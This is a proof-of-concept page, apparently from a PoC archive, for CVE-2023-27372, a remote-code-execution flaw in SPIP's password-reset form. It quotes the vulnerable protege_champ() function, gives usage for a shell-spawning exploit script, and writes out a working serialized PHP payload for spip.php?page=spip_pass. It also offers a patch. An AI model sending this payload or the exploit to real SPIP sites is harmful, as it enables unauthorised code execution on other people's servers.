Related vulnerability
Description
This is a PoC for CVE-2023-27372 that spawns a fully interactive shell.
Introduction
### This is a proof of concept for the CVE-2023-27372 SPIP RCE vulnerability.
Usage: `python3 exploit.py -u http(s)://url.com`

It is a deserialization flaw: the reset-password feature (`spip.php?page=spip_pass`) renders form values through the `#ENV` tag in `/ecrire/balise/formulaire_.php`, and the filter that tag applies to the value, `protege_champ()`, is the code below:
```php
function protege_champ($texte) {
    if (is_array($texte)) {
        $texte = array_map('protege_champ', $texte);
    } else {
        // ne pas corrompre une valeur serialize
        // ("do not corrupt a serialized value"): anything that looks like
        // serialized data AND unserializes cleanly is returned with no escaping at all
        if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte) != false) {
            return $texte;
        }
        // everything else is HTML-escaped; the entity below was lost as "'" in the page's copy
        $texte = entites_html($texte);
        $texte = str_replace("'", '&#039;', $texte);
    }
    return $texte;
}
```
The `protege_champ()` function has two problems. The regular expression only checks that the value *looks like* a serialized PHP scalar or array (an `a`, `b`, `i` or `s` prefix followed by a length), which any attacker can write by hand. Any value that matches and that `unserialize()` accepts is then returned verbatim, without `entites_html()`, so attacker-controlled text, including a `<?php ... ?>` block, reaches the rendered form unescaped and is executed. Manual exploitation is therefore trivial. For example, to execute `phpinfo()`, send the following `oubli` value to `spip.php?page=spip_pass` (19 is the byte length of the quoted string; on a length mismatch `unserialize()` returns `false` and the filter falls back to escaping):
```
oubli=s:19:"<?php phpinfo(); ?>";
```
If the response contains the `phpinfo()` output, the target is vulnerable. Patching is straightforward; below is a basic patch:
```php
// Minimal implementation of the validator, added because the original snippet
// did not define it: reject anything that looks like serialized PHP data or
// carries a PHP open tag. Everything else is escaped as before.
function isValidInput($texte) {
    return !preg_match(",^[abis]:\d+[:;],", $texte) && strpos($texte, '<?') === false;
}

function protege_champ($texte) {
    if (is_array($texte)) {
        $texte = array_map('protege_champ', $texte);
    } else {
        if (!isValidInput($texte)) {
            $texte = 'Malicious input detected';
        } else {
            // no unserialize() branch: nothing is ever returned unescaped
            $texte = entites_html($texte);
            $texte = str_replace("'", '&#039;', $texte);
        }
    }
    return $texte;
}
```
The patched `protege_champ()` never returns a value without escaping it: input that fails validation is replaced, and everything else goes through `entites_html()`. Removing the `unserialize()` pass-through is what closes the hole; whether rejected input is replaced, as here, or simply escaped like any other value is a policy choice, and escaping alone is enough to stop the injection.

[Twitter](https://twitter.com/redboltsec)
File snapshot
[4.0K] /data/pocs/4f359282673ad6f60794730905bf844ca5fd8136
├── [4.7K] cve-2023-27372.py
├── [1.7K] README.md
└── [ 29] requirements.txt
0 directories, 3 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.